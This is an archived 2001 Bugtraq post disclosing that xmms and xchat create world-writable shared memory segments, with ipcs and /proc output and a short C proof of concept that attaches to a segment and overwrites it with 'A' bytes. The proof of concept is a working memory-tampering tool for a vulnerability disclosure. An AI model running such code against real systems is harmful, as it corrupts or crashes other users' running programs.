[23061] in bugtraq
xmms/xchat full access shared memory segments
daemon@ATHENA.MIT.EDU (Julien VANEGUE)
Sun Nov 4 21:44:09 2001
Content-Type: text/plain;
charset="iso-8859-1"
From: Julien VANEGUE <vanegu_j@epita.fr>
Reply-To: vanegu_j@epita.fr
To: bugtraq@securityfocus.com
Date: Sat, 3 Nov 2001 12:22:23 +0200
MIME-Version: 1.0
Message-Id: <0111031122230M.12122@daril>
Content-Transfer-Encoding: 8bit
On slackware 8 :
bash-2.05$ ipcs -m
------ Shared Memory Segments --------
key shmid owner perms bytes nattch status
0x00000000 4216960 mayhem 777 196608 2 dest
0x00000000 7636737 mayhem 777 196608 2 dest
bash-2.05$ ipcs -p -m
------ Shared Memory Creator/Last-op --------
shmid owner cpid lpid
4216960 mayhem 3921 1406
7636737 mayhem 26206 26209
bash-2.05$ cat /proc/3921/cmdline ; echo
/opt/gnome/bin/xmms
bash-2.05$ cat /proc/26206/cmdline ; echo
/opt/gnome/bin/xchat
bash-2.05$
Seems not to be exploitable (no fault) but still need to be fixed .
/*
** test_shm.c
**
** Made by Julien Vanegue
** Login <mayhem@hert.org>
*/
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <stdio.h>
#include <stdlib.h>
#define FATAL(str) { perror(str); exit(-1); }
void usage()
{
fprintf(stderr, "syntax: a.out semid size \n");
exit(-1);
}
int main(int argc, char **argv)
{
char *addr;
if (argc != 3)
usage();
if ((addr = shmat(atoi(argv[1]), 0, 0)) == (void *) -1)
FATAL("shmget");
memset(addr, 'A', atoi(argv[2]));
sleep(2);
}
